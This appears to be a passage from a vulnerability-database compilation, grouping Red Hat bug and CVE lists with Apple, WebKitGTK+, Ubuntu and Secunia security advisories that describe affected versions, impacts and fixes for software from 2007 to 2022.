2116225 - The filter keyword of the related operator 'Openshift Data Foundation' is 'OCS' rather than 'ODF' 2116644 - Importer pod is failing to start with error "MountVolume.SetUp failed for volume "cdi-proxy-cert-vol" : configmap "custom-ca" not found" 2117549 - Cannot edit cloud-init data after add ssh key 2117803 - Cannot edit ssh even vm is stopped 2117813 - Improve descriptive text of VM details while VM is off 2117872 - CVE-2022-1798 kubeVirt: Arbitrary file read on the host from KubeVirt VMs 2118257 - outdated doc link tolerations modal 2118823 - Deprecated API 1.25 call: virt-cdi-controller/v0.0.0 (linux/amd64) kubernetes/$Format 2119069 - Unable to start windows VMs on PSI setups 2119128 - virt-launcher cannot be started on OCP 4.12 due to PodSecurity restricted:v1.24 2119309 - readinessProbe in VM stays on failed 2119615 - Change the disk size causes the unit changed 2120907 - Cannot filter disks by label 2121320 - Negative values in migration metrics 2122236 - Failing to delete HCO with SSP sticking around 2122990 - VMExport should check APIGroup 2124147 - "ReadOnlyMany" should not be added to supported values in memory dump 2124307 - Ui crash/stuck on loading when trying to detach disk on a VM 2124528 - On upgrade, when live-migration is failed due to an infra issue, virt-handler continuously and endlessly tries to migrate it 2124555 - View documentation link on MigrationPolicies page des not work 2124557 - MigrationPolicy description is not displayed on Details page 2124558 - Non-privileged user can start MigrationPolicy creation 2124565 - Deleted DataSource reappears in list 2124572 - First annotation can not be added to DataSource 2124582 - Filtering VMs by OS does not work 2124594 - Docker URL validation is inconsistent over application 2124597 - Wrong case in Create DataSource menu 2126104 - virtctl image-upload hangs waiting for pod to be ready with missing access mode defined in the storage profile 2126397 - many KubeVirtComponentExceedsRequestedMemory alerts in Firing state 2127787 - Expose the PVC source of the dataSource on UI 2127843 - UI crashed by selecting "Live migration network" 2127931 - Change default time range on Virtualization -> Overview -> Monitoring dashboard to 30 minutes 2127947 - cluster-network-addons-config tlsSecurityProfle takes a long time to update after setting APIServer 2128002 - Error after VM template deletion 2128107 - sriov-manage command fails to enable SRIOV Virtual functions on the Ampere GPU Cards 2128872 - [4.11]Can't restore cloned VM 2128948 - Cannot create DataSource from default YAML 2128949 - Cannot create MigrationPolicy from example YAML 2128997 - [4.11.1]virt-launcher cannot be started on OCP 4.12 due to PodSecurity restricted:v1.24 2129013 - Mark Windows 11 as TechPreview 2129234 - Service is not deleted along with the VM when the VM is created from a template with service 2129301 - Cloud-init network data don't wipe out on uncheck checkbox 'Add network data' 2129870 - crypto-policy : Accepting TLS 1.3 connections by validating webhook 2130509 - Auto image import in failed state with data sources pointing to external manually-created PVC/DV 2130588 - crypto-policy : Common Ciphers support by apiserver and hco 2130695 - crypto-policy : Logging Improvement and publish the source of ciphers 2130909 - Non-privileged user can start DataSource creation 2131157 - KV data transfer rate chart in VM Metrics tab is not displayed 2131165 - [dark mode] Additional statuses accordion on Virtualization Overview page not visible enough 2131674 - Bump virtlogd memory requirement to 20Mi 2132031 - Ensure Windows 2022 Templates are marked as TechPreview like it is done now for Windows 11 2132682 - Default YAML entity name convention. 2132721 - Delete dialogs 2132744 - Description text is missing in Live Migrations section 2132746 - Background is broken in Virtualization Monitoring page 2132783 - VM can not be created from Template with edited boot source 2132793 - Edited Template BSR is not saved 2132932 - Typo in PVC size units menu 2133540 - [pod security violation audit] Audit violation in "cni-plugins" container should be fixed 2133541 - [pod security violation audit] Audit violation in "bridge-marker" container should be fixed 2133542 - [pod security violation audit] Audit violation in "manager" container should be fixed 2133543 - [pod security violation audit] Audit violation in "kube-rbac-proxy" container should be fixed 2133655 - [pod security violation audit] Audit violation in "cdi-operator" container should be fixed 2133656 - [4.12][pod security violation audit] Audit violation in "hostpath-provisioner-operator" container should be fixed 2133659 - [pod security violation audit] Audit violation in "cdi-controller" container should be fixed 2133660 - [pod security violation audit] Audit violation in "cdi-source-update-poller" container should be fixed 2134123 - KubeVirtComponentExceedsRequestedMemory Alert for virt-handler pod 2134672 - [e2e] add data-test-id for catalog -> storage section 2134825 - Authorization for expand-spec endpoint missing 2135805 - Windows 2022 template is missing vTPM and UEFI params in spec 2136051 - Name jumping when trying to create a VM with source from catalog 2136425 - Windows 11 is detected as Windows 10 2136534 - Not possible to specify a TTL on VMExports 2137123 - VMExport: export pod is not PSA complaint 2137241 - Checkbox about delete vm disks is not loaded while deleting VM 2137243 - registery input add docker prefix twice 2137349 - "Manage source" action infinitely loading on DataImportCron details page 2137591 - Inconsistent dialog headings/titles 2137731 - Link of VM status in overview is not working 2137733 - No link for VMs in error status in "VirtualMachine statuses" card 2137736 - The column name "MigrationPolicy name" can just be "Name" 2137896 - crypto-policy: HCO should pick TLSProfile from apiserver if not provided explicitly 2138112 - Unsupported S3 endpoint option in Add disk modal 2138119 - "Customize VirtualMachine" flow is not user-friendly because settings are split into 2 modals 2138199 - Win11 and Win22 templates are not filtered properly by Template provider 2138653 - Saving Template prameters reloads the page 2138657 - Setting DATA_SOURCE_* Template parameters makes VM creation fail 2138664 - VM that was created with SSH key fails to start 2139257 - Cannot add disk via "Using an existing PVC" 2139260 - Clone button is disabled while VM is running 2139293 - Non-admin user cannot load VM list page 2139296 - Non-admin cannot load MigrationPolicies page 2139299 - No auto-generated VM name while creating VM by non-admin user 2139306 - Non-admin cannot create VM via customize mode 2139479 - virtualization overview crashes for non-priv user 2139574 - VM name gets "emptyname" if click the create button quickly 2139651 - non-priv user can click create when have no permissions 2139687 - catalog shows template list for non-priv users 2139738 - [4.12]Can't restore cloned VM 2139820 - non-priv user cant reach vm details 2140117 - Provide upgrade path from 4.11.1->4.12.0 2140521 - Click the breadcrumb list about "VirtualMachines" goes to undefined project 2140534 - [View only] it should give a permission error when user clicking the VNC play/connect button as a view only user 2140627 - Not able to select storageClass if there is no default storageclass defined 2140730 - Links on Virtualization Overview page lead to wrong namespace for non-priv user 2140808 - Hyperv feature set to "enabled: false" prevents scheduling 2140977 - Alerts number is not correct on Virtualization overview 2140982 - The base template of cloned template is "Not available" 2140998 - Incorrect information shows in overview page per namespace 2141089 - Unable to upload boot images. 2141302 - Unhealthy states alerts and state metrics are missing 2141399 - Unable to set TLS Security profile for CDI using HCO jsonpatch annotations 2141494 - "Start in pause mode" option is not available while creating the VM 2141654 - warning log appearing on VMs: found no SR-IOV networks 2141711 - Node column selector is redundant for non-priv user 2142468 - VM action "Stop" should not be disabled when VM in pause state 2142470 - Delete a VM or template from all projects leads to 404 error 2142511 - Enhance alerts card in overview 2142647 - Error after MigrationPolicy deletion 2142891 - VM latency checkup: Failed to create the checkup's Job 2142929 - Permission denied when try get instancestypes 2143268 - Topolvm storageProfile missing accessModes and volumeMode 2143498 - Could not load template while creating VM from catalog 2143964 - Could not load template while creating VM from catalog 2144580 - "?" icon is too big in VM Template Disk tab 2144828 - "?" icon is too big in VM Template Disk tab 2144839 - Alerts number is not correct on Virtualization overview 2153849 - After upgrade to 4.11.1->4.12.0 hco.spec.workloadUpdateStrategy value is getting overwritten 2155757 - Incorrect upstream-version label "v1.6.0-unstable-410-g09ea881c" is tagged to 4.12 hyperconverged-cluster-operator-container and hyperconverged-cluster-webhook-container 5. Description: Migration Toolkit for Applications 6.0.1 Images Security Fix(es) from Bugzilla: * loader-utils: prototype pollution in function parseQuery in parseQuery.js (CVE-2022-37601) * Apache-Commons-BCEL: arbitrary bytecode produced via out-of-bounds writing (CVE-2022-42920) * gin: Unsanitized input in the default logger in github.com/gin-gonic/gin (CVE-2020-36567) * glob-parent: Regular Expression Denial of Service (CVE-2021-35065) * express: "qs" prototype poisoning causes the hang of the node process (CVE-2022-24999) * loader-utils:Regular expression denial of service (CVE-2022-37603) * golang: net/http: An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests (CVE-2022-41717) * json5: Prototype Pollution in JSON5 via Parse Method (CVE-2022-46175) For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section. Bugs fixed (https://bugzilla.redhat.com/): 2134876 - CVE-2022-37601 loader-utils: prototype pollution in function parseQuery in parseQuery.js 2140597 - CVE-2022-37603 loader-utils:Regular expression denial of service 2142707 - CVE-2022-42920 Apache-Commons-BCEL: arbitrary bytecode produced via out-of-bounds writing 2150323 - CVE-2022-24999 express: "qs" prototype poisoning causes the hang of the node process 2156263 - CVE-2022-46175 json5: Prototype Pollution in JSON5 via Parse Method 2156324 - CVE-2021-35065 glob-parent: Regular Expression Denial of Service 2156683 - CVE-2020-36567 gin: Unsanitized input in the default logger in github.com/gin-gonic/gin 2161274 - CVE-2022-41717 golang: net/http: An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests 5. JIRA issues fixed (https://issues.jboss.org/): MTA-103 - MTA 6.0.1 Installation failed with CrashLoop Error for UI Pod MTA-106 - Implement ability for windup addon image pull policy to be configurable MTA-122 - MTA is upgrading automatically ignoring 'Manual' setting MTA-123 - MTA Becomes unusable when running bulk binary analysis MTA-127 - After upgrading MTA operator from 6.0.0 to 6.0.1 and running analysis , task pods starts failing MTA-131 - Analysis stops working after MTA upgrade from 6.0.0 to 6.0.1 MTA-36 - Can't disable a proxy if it has an invalid configuration MTA-44 - Make RWX volumes optional. MTA-49 - Uploaded a local binary when return back to the page the UI should show green bar and correct % MTA-59 - Getting error 401 if deleting many credentials quickly MTA-65 - Set windup addon image pull policy to be controlled by the global image_pull_policy parameter MTA-72 - CVE-2022-46175 mta-ui-container: json5: Prototype Pollution in JSON5 via Parse Method [mta-6] MTA-73 - CVE-2022-37601 mta-ui-container: loader-utils: prototype pollution in function parseQuery in parseQuery.js [mta-6] MTA-74 - CVE-2020-36567 mta-windup-addon-container: gin: Unsanitized input in the default logger in github.com/gin-gonic/gin [mta-6] MTA-76 - CVE-2022-37603 mta-ui-container: loader-utils:Regular expression denial of service [mta-6] MTA-77 - CVE-2020-36567 mta-hub-container: gin: Unsanitized input in the default logger in github.com/gin-gonic/gin [mta-6] MTA-80 - CVE-2021-35065 mta-ui-container: glob-parent: Regular Expression Denial of Service [mta-6] MTA-82 - CVE-2022-42920 org.jboss.windup-windup-cli-parent: Apache-Commons-BCEL: arbitrary bytecode produced via out-of-bounds writing [mta-6.0] MTA-85 - CVE-2022-24999 mta-ui-container: express: "qs" prototype poisoning causes the hang of the node process [mta-6] MTA-88 - CVE-2020-36567 mta-admin-addon-container: gin: Unsanitized input in the default logger in github.com/gin-gonic/gin [mta-6] MTA-92 - CVE-2022-42920 org.jboss.windup.plugin-windup-maven-plugin-parent: Apache-Commons-BCEL: arbitrary bytecode produced via out-of-bounds writing [mta-6.0] MTA-96 - [UI] Maven -> "Local artifact repository" textbox can be checked and has no tooltip 6
var-201804-1180 An issue was discovered in certain Apple products. iOS before 11.3 is affected. Safari before 11.1 is affected. iCloud before 7.4 on Windows is affected. iTunes before 12.7.4 on Windows is affected. tvOS before 11.3 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site. Apple iOS is an operating system developed for mobile devices; Safari is a web browser that is the default browser included with Mac OS X and iOS operating systems. WebKit is one of the web browser engine components. A security vulnerability exists in the WebKit component of several Apple products. The following products and versions are affected: Apple iOS prior to 11.3; Safari prior to 11.1; Windows-based iCloud prior to 7.4; Windows-based iTunes prior to 12.7.4; tvOS prior to 11.3. ------------------------------------------------------------------------ WebKitGTK+ Security Advisory WSA-2018-0003 ------------------------------------------------------------------------ Date reported : April 04, 2018 Advisory ID : WSA-2018-0003 Advisory URL : https://webkitgtk.org/security/WSA-2018-0003.html CVE identifiers : CVE-2018-4101, CVE-2018-4113, CVE-2018-4114, CVE-2018-4117, CVE-2018-4118, CVE-2018-4119, CVE-2018-4120, CVE-2018-4122, CVE-2018-4125, CVE-2018-4127, CVE-2018-4128, CVE-2018-4129, CVE-2018-4133, CVE-2018-4146, CVE-2018-4161, CVE-2018-4162, CVE-2018-4163, CVE-2018-4165. Several vulnerabilities were discovered in WebKitGTK+. Credit to Yuan Deng of Ant-financial Light-Year Security Lab. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to OSS-Fuzz. Impact: Unexpected interaction with indexing types causing an ASSERT failure. Description: An array indexing issue existed in the handling of a function in JavaScriptCore. This issue was addressed through improved checks. Credit to OSS-Fuzz. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to an anonymous researcher. Impact: A malicious website may exfiltrate data cross-origin. Description: A cross-origin issue existed with the fetch API. This was addressed through improved input validation. Credit to Jun Kokatsu (@shhnjk). Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to an anonymous researcher working with Trend Microys Zero Day Initiative. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to Hanming Zhang (@4shitak4) of Qihoo 360 Vulcan Team. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to WanderingGlitch of Trend Micro's Zero Day Initiative. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to WanderingGlitch of Trend Micro's Zero Day Initiative. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to an anonymous researcher working with Trend Microys Zero Day Initiative. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to Zach Markley. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to likemeng of Baidu Security Lab working with Trend Micro's Zero Day Initiative. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to Anton Lopanitsyn of Wallarm, Linus Sarud of Detectify (detectify.com), Yuji Tounai of NTT Communications Corporation. Impact: Visiting a maliciously crafted website may lead to a cross- site scripting attack. This issue was addressed with improved URL validation. Credit to OSS-Fuzz. Impact: Processing maliciously crafted web content may lead to a denial of service. Description: A memory corruption issue was addressed through improved input validation. Credit to WanderingGlitch of Trend Micro's Zero Day Initiative. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to WanderingGlitch of Trend Micro's Zero Day Initiative. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to WanderingGlitch of Trend Micro's Zero Day Initiative. Description: Multiple memory corruption issues were addressed with improved memory handling. Credit to Hanming Zhang (@4shitak4) of Qihoo 360 Vulcan Team. Description: Multiple memory corruption issues were addressed with improved memory handling. We recommend updating to the last stable version of WebKitGTK+. It is the best way of ensuring that you are running a safe version of WebKitGTK+. Please check our website for information about the last stable releases. Further information about WebKitGTK+ Security Advisories can be found at: https://webkitgtk.org/security.html The WebKitGTK+ team, April 04, 2018 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 APPLE-SA-2018-3-29-1 iOS 11.3 iOS 11.3 is now available and addresses the following: Clock Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A person with physical access to an iOS device may be able to see the email address used for iTunes Description: An information disclosure issue existed in the handling of alarms and timers. CVE-2018-4123: Zaheen Hafzar M M (@zaheenhafzer) CoreFoundation Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to gain elevated privileges Description: A race condition was addressed with additional validation. CVE-2018-4155: Samuel GroA (@5aelo) CVE-2018-4158: Samuel GroA (@5aelo) CoreText Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Processing a maliciously crafted string may lead to a denial of service Description: A denial of service issue was addressed through improved memory handling. CVE-2018-4142: Robin Leroy of Google Switzerland GmbH File System Events Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to gain elevated privileges Description: A race condition was addressed with additional validation. CVE-2018-4167: Samuel GroA (@5aelo) Files Widget Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: File Widget may display contents on a locked device Description: The File Widget was displaying cached data when in the locked state. CVE-2018-4168: Brandon Moore Find My iPhone Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A person with physical access to the device may be able to disable Find My iPhone without entering an iCloud password Description: A state management issue existed when restoring from a back up. CVE-2018-4172: Viljami VastamA$?ki iCloud Drive Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to gain elevated privileges Description: A race condition was addressed with additional validation. CVE-2018-4151: Samuel GroA (@5aelo) Kernel Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A malicious application may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2018-4150: an anonymous researcher Kernel Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to read restricted memory Description: A validation issue was addressed with improved input sanitization. CVE-2018-4104: The UK's National Cyber Security Centre (NCSC) Kernel Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2018-4143: derrek (@derrekr6) Mail Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An attacker in a privileged network position may be able to intercept the contents of S/MIME-encrypted e-mail Description: An inconsistent user interface issue was addressed with improved state management. CVE-2018-4174: an anonymous researcher, an anonymous researcher NSURLSession Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to gain elevated privileges Description: A race condition was addressed with additional validation. CVE-2018-4166: Samuel GroA (@5aelo) PluginKit Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to gain elevated privileges Description: A race condition was addressed with additional validation. CVE-2018-4156: Samuel GroA (@5aelo) Quick Look Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to gain elevated privileges Description: A race condition was addressed with additional validation. CVE-2018-4157: Samuel GroA (@5aelo) Safari Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Visiting a malicious website by clicking a link may lead to user interface spoofing Description: An inconsistent user interface issue was addressed with improved state management. CVE-2018-4134: xisigr of Tencent's Xuanwu Lab (tencent.com), Zhiyang Zeng (@Wester) of Tencent Security Platform Department Safari Login AutoFill Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A malicious website may be able to exfiltrate autofilled data in Safari without explicit user interaction. Description: Safari autofill did not require explicit user interaction before taking place. CVE-2018-4137: SafariViewController Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Visiting a malicious website may lead to user interface spoofing Description: A state management issue was addressed by disabling text input until the destination page loads. CVE-2018-4149: Abhinash Jain (@abhinashjain) Security Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A malicious application may be able to elevate privileges Description: A buffer overflow was addressed with improved size validation. CVE-2018-4144: Abraham Masri (@cheesecakeufo) Storage Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An application may be able to gain elevated privileges Description: A race condition was addressed with additional validation. CVE-2018-4154: Samuel GroA (@5aelo) System Preferences Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A configuration profile may incorrectly remain in effect after removal Description: An issue existed in CFPreferences. CVE-2018-4115: Johann Thalakada, Vladimir Zubkov, and Matt Vlasach of Wandera Telephony Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A remote attacker can cause a device to unexpectedly restart Description: A null pointer dereference issue existed when handling Class 0 SMS messages. CVE-2018-4140: @mjonsson, Arjan van der Oest of Voiceworks BV Web App Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Cookies may unexpectedly persist in web app Description: A cookie management issue was addressed through improved state management. CVE-2018-4110: Ben Compton and Jason Colley of Cerner Corporation WebKit Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2018-4146: found by OSS-Fuzz WebKit Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: A malicious website may exfiltrate data cross-origin Description: A cross-origin issue existed with the fetch API. CVE-2018-4117: an anonymous researcher, an anonymous researcher WindowServer Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation Impact: An unprivileged application may be able to log keystrokes entered into other applications even when secure input mode is enabled Description: By scanning key states, an unprivileged application could log keystrokes entered into other applications even when secure input mode was enabled. CVE-2018-4131: Andreas Hegenberg of folivora.AI GmbH Additional recognition WebKit We would like to acknowledge Johnny Nipper of Tinder Security Team for their assistance. Installation note: This update is available through iTunes and Software Update on your iOS device, and will not appear in your computer's Software Update application, or in the Apple Downloads site. Make sure you have an Internet connection and have installed the latest version of iTunes from https://www.apple.com/itunes/ iTunes and Software Update on the device will automatically check Apple's update server on its weekly schedule. When an update is detected, it is downloaded and the option to be installed is presented to the user when the iOS device is docked. We recommend applying the update immediately if possible. Selecting Don't Install will present the option the next time you connect your iOS device. The automatic update process may take up to a week depending on the day that iTunes or the device checks for updates. You may manually obtain the update via the Check for Updates button within iTunes, or the Software Update on your device. To check that the iPhone, iPod touch, or iPad has been updated: * Navigate to Settings * Select General * Select About. Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- iQJdBAEBCgBHFiEEcuX4rtoRe4X62yWlg6PvjDRstEYFAlq9GlopHHByb2R1Y3Qt c2VjdXJpdHktbm9yZXBseUBsaXN0cy5hcHBsZS5jb20ACgkQg6PvjDRstEbhLRAA to9k0U/CI3PfYp2o2lluS7LgE3jvA7+pXvdjbvoh14BFHf9Wv+yhdtyLQEDSne+0 TM8BkiMgEmo+uKKcVFCDeV9GrkWqO7ocBfT65hj4A/vxPAS6xlBTV9mjZXiqvSWs +Cbb4Nd53o6m2QRORkjNVZ2h0ow53J5RirnyzjWt4LMdCpc4jMG87OCuQheKzjxq g6gOlwblVrRxH6aMX5if/SetGGxzZeY5sKwe1Xhz6yIYsm1Gw45REt3FJs4KEh5Z oL+yWVvaGLOPDzC+DBX0dXJmsqLx9wzDJsqQ2J6Mb/nh1Tgh6NDdHkDCAZ7P6CeU 0IpXK7aaPkRy5GUbkAdzdPEFql9e0/jGlqMf/rZlNTItbgtn0+9e2zsJ0UPPRcWi +7IQygkXnXmYUZ0wrh/Wdye/jAJZpLdsUuWr1RalTdmDASU/tzgpoglf3EyTQoRy IqFGRSe6+no8Pw1qCLUvZz8C6dTKvE+Jv5oe9XbCEjsvpRmQZK64FiQ0HIaAMHKo Rl9OY6+evzyqdAtivE4AFCRT7Z15pktFYAVefWkdVFbVU2mCYF+peXIq6tGg4o+g 70E29XaDZBakcVho9bW4e2rDA+m606ILuZ4AyjEEvfRYH+d+WTvDqdIywq0V7grj qlU787sRw/tVx646jcHVqbYZEgZVmeAvcT8C2c0Zhvo= =RJi8 -----END PGP SIGNATURE----- . ========================================================================== Ubuntu Security Notice USN-3635-1 April 30, 2018 webkit2gtk vulnerabilities ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 17.10 - Ubuntu 16.04 LTS Summary: Several security issues were fixed in WebKitGTK+. Software Description: - webkit2gtk: Web content engine library for GTK+ Details: A large number of security issues were discovered in the WebKitGTK+ Web and JavaScript engines. Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 17.10: libjavascriptcoregtk-4.0-18 2.20.1-0ubuntu0.17.10.1 libwebkit2gtk-4.0-37 2.20.1-0ubuntu0.17.10.1 Ubuntu 16.04 LTS: libjavascriptcoregtk-4.0-18 2.20.1-0ubuntu0.16.04.1 libwebkit2gtk-4.0-37 2.20.1-0ubuntu0.16.04.1 This update uses a new upstream release, which includes additional bug fixes. After a standard system update you need to restart any applications that use WebKitGTK+, such as Epiphany, to make all the necessary changes. References: https://usn.ubuntu.com/usn/usn-3635-1 CVE-2018-4101, CVE-2018-4113, CVE-2018-4114, CVE-2018-4117, CVE-2018-4118, CVE-2018-4119, CVE-2018-4120, CVE-2018-4122, CVE-2018-4125, CVE-2018-4127, CVE-2018-4128, CVE-2018-4129, CVE-2018-4133, CVE-2018-4146, CVE-2018-4161, CVE-2018-4162, CVE-2018-4163, CVE-2018-4165 Package Information: https://launchpad.net/ubuntu/+source/webkit2gtk/2.20.1-0ubuntu0.17.10.1 https://launchpad.net/ubuntu/+source/webkit2gtk/2.20.1-0ubuntu0.16.04.1 . Installation note: Safari 11.1 may be obtained from the Mac App Store
var-200809-0194 VideoConference in Apple Mac OS X 10.4.11 and 10.5 through 10.5.4 allows remote attackers to cause a denial of service (memory corruption and application crash) or execute arbitrary code via vectors involving H.264 encoded media. Apple Mac OS X Leopard does not accurately reflect which files and directories are available via sharing. A vulnerability in a common PHP extension module could allow a remote attacker to execute code on a vulnerable system. The security update addresses a total of 17 new vulnerabilities that affect the Apple Type Services, Directory Services, Finder, ImageIO, Kernel, Login Windows, SearchKit, System Configuration, System Preferences, Time Machine, VideoConference, and Wiki Server components of Mac OS X. The advisory also contains security updates for 17 previously reported issues. Video conferencing with a malicious user could lead to unexpected application termination or arbitrary code execution. ---------------------------------------------------------------------- Bist Du interessiert an einem neuen Job in IT-Sicherheit? Secunia hat zwei freie Stellen als Junior und Senior Spezialist in IT- Sicherheit: http://secunia.com/secunia_vacancies/ ---------------------------------------------------------------------- TITLE: Nucleus XML-RPC PHP Code Execution Vulnerability SECUNIA ADVISORY ID: SA15895 VERIFY ADVISORY: http://secunia.com/advisories/15895/ CRITICAL: Highly critical IMPACT: System access WHERE: >From remote SOFTWARE: Nucleus 3.x http://secunia.com/product/3699/ DESCRIPTION: A vulnerability has been reported in Nucleus, which can be exploited by malicious people to compromise a vulnerable system. For more information: SA15852 SOLUTION: Update to version 3.21. http://sourceforge.net/project/showfiles.php?group_id=66479 OTHER REFERENCES: SA15852: http://secunia.com/advisories/15852/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------
var-200704-0214 fsck, as used by the AirPort Disk feature of the AirPort Extreme Base Station with 802.11n before Firmware Update 7.1, and by Apple Mac OS X 10.3.9 through 10.4.9, does not properly enforce password protection of a USB hard drive, which allows context-dependent attackers to list arbitrary directories or execute arbitrary code, resulting from memory corruption. A vulnerability exists in the Kerberos administration daemon that may allow a remote, unauthenticated user to free uninitialized pointers. Freeing uninitialized pointers corrupts memory in a way that could allow an attacker to execute code. Apple of 802.11n Corresponding AirMac Extreme The base station AirMac There is an issue with password protection on disks not working properly. Also, Mac OS X Used in fsck Contains a memory corruption vulnerability.AirMac Extreme If it is password protected AirMac The file name on the disc may be viewed by users on the local network. Also Mac OS X In the case of a disc image crafted by a third party USF In the file system fsck By executing, arbitrary code may be executed. Apple Mac OS X is prone to multiple security vulnerabilities. These issues affect Mac OS X and various applications, including AFP Client, AirPortDriver module, CoreServices, Libinfo, Login Window, Natd, SMB, System Configuration, URLMount, VideoConference framework, WebDAV, and WebFoundation. Attackers may exploit these issues to execute arbitrary code, trigger denial-of-service conditions, escalate privileges, overwrite files, and access potentially sensitive information. Both local and remote vulnerabilities are present. Apple Mac OS X 10.4.9 and prior versions are vulnerable to these issues. Apple AirPort Extreme Base Station is prone to an information-disclosure vulnerability. An attacker can exploit this issue to view filenames on a password-protected AirPort Disk without supplying a password. Firmware versions prior to 7.1 are vulnerable. There is a loophole in the implementation of the AirPort Disk function, and remote attackers may use this loophole to remotely obtain sensitive information. The AirPort Disk feature allows users on the local network to browse file names (but not file content) on a password-protected disk without providing a password, resulting in the disclosure of sensitive information. ---------------------------------------------------------------------- Secunia is proud to announce the availability of the Secunia Software Inspector. The Secunia Software Inspector is a free service that detects insecure versions of software that you may have installed in your system. When insecure versions are detected, the Secunia Software Inspector also provides thorough guidelines for updating the software to the latest secure version from the vendor. Try it out online: http://secunia.com/software_inspector/ ---------------------------------------------------------------------- TITLE: Fedora Core 6 update for krb5 SECUNIA ADVISORY ID: SA23706 VERIFY ADVISORY: http://secunia.com/advisories/23706/ CRITICAL: Highly critical IMPACT: DoS, System access WHERE: >From remote OPERATING SYSTEM: Fedora Core 6 http://secunia.com/product/12487/ DESCRIPTION: Fedora has issued an update for krb5. This fixes some vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service) or potentially compromise a vulnerable system. For more information: SA23690 SA23696 SOLUTION: Apply updated packages. Fedora Core 6: 43b1b9c946f30629489b903961472d9b0cdf1cd8 SRPMS/krb5-1.5-13.src.rpm 43b1b9c946f30629489b903961472d9b0cdf1cd8 noarch/krb5-1.5-13.src.rpm 42b9b525ea97d128ed22c6feb7b48cc377ca46ad ppc/debug/krb5-debuginfo-1.5-13.ppc.rpm 51c9dfac74d9026509906e953cf92ac50e1a13c4 ppc/krb5-workstation-1.5-13.ppc.rpm 39a5ed204a75766df9daf51a66971f51700d563c ppc/krb5-server-1.5-13.ppc.rpm bce7df56293ae51d79ce1e054b3056d24a1ae8d5 ppc/krb5-devel-1.5-13.ppc.rpm 9097a6f8fdda32e8b976b0beb2b03ba66172327e ppc/krb5-libs-1.5-13.ppc.rpm 51c1f15fca97f267cabd1d1a9851a349fc5a3648 x86_64/krb5-workstation-1.5-13.x86_64.rpm 7cc0d54545539827434c7975697c9c13ae9e4797 x86_64/debug/krb5-debuginfo-1.5-13.x86_64.rpm 71fcdc5dadb273576ad9e530fbb15764650cb84b x86_64/krb5-devel-1.5-13.x86_64.rpm bbe8f1b3e7c6077526f760b361ad6ca5d4039276 x86_64/krb5-libs-1.5-13.x86_64.rpm e38c1dccd2310d3bab9d204226988aee627cfe0d x86_64/krb5-server-1.5-13.x86_64.rpm 02ddf8b25bea088b4de3cc8c27fcf3eb2967efa6 i386/debug/krb5-debuginfo-1.5-13.i386.rpm 